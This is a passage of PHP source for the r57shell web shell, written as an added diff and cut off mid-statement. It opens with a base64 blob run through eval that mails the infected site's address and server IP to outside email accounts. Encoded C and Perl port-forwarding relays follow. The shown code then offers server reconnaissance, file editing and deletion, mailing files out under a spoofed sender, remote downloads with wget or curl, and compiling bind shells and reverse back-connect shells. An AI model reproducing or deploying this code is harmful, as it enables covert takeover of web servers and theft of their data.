+$a="JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsg +JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkYm9keSA9ICJhZGEgeWFuZyBpbmplY3Qg +XG4kd2ViJGluaiI7JHNleG1vZGUgPQ0KQGluaV9nZXQoJ3NhZmVfbW9kZScpO2lmKCRzZXhtb2RlPT0xKXskbmdlbnRvdD0gIlNhZmVfTW9kZT1PTiI7 +fSBlbHNlIHskbmdlbnRvdD0NCiJTYWZlX01vZGU9T0ZGIjt9OyRzZXJwZXI9Z2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnU0VSVkVSX0FERFInXSk7JGlu +amVrdG9yID0NCmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pO21haWwoInRyZWttYW4wMDhAeWFob28uY29tIiwic2V0b3JhbiBw +YWsgaHR0cDovLyR3ZWIkaW5qXG4kbmdlbnRvdFxuSVAgU2VydmVyID0gJHNlcnBlclxuIElQIEluamVjdG9yPSAkaW5qZWt0b3IiLA0KIiRib2R5Iik7 +bWFpbCgiY2lrYWwuYWN0aW9uQGdtYWlsLmNvbSIsInNldG9yYW4gYm96IGt1cmlzDQpodHRwOi8vJHdlYiRpbmpcbiRuZ2VudG90XG5JUCBTZXJ2ZXIg +PSAkc2VycGVyXG4gSVAgSW5qZWN0b3I9ICRpbmpla3RvciIsDQoiJGJvZHkiKTt9IGVsc2UgJHZpc2l0Y291bnQgOyBzZXRjb29raWUoInZpc2l0cyIs +JHZpc2l0Y291bnQpOw=";echo eval(base64_decode($a)); +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> + +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> + +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error mengupload file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { 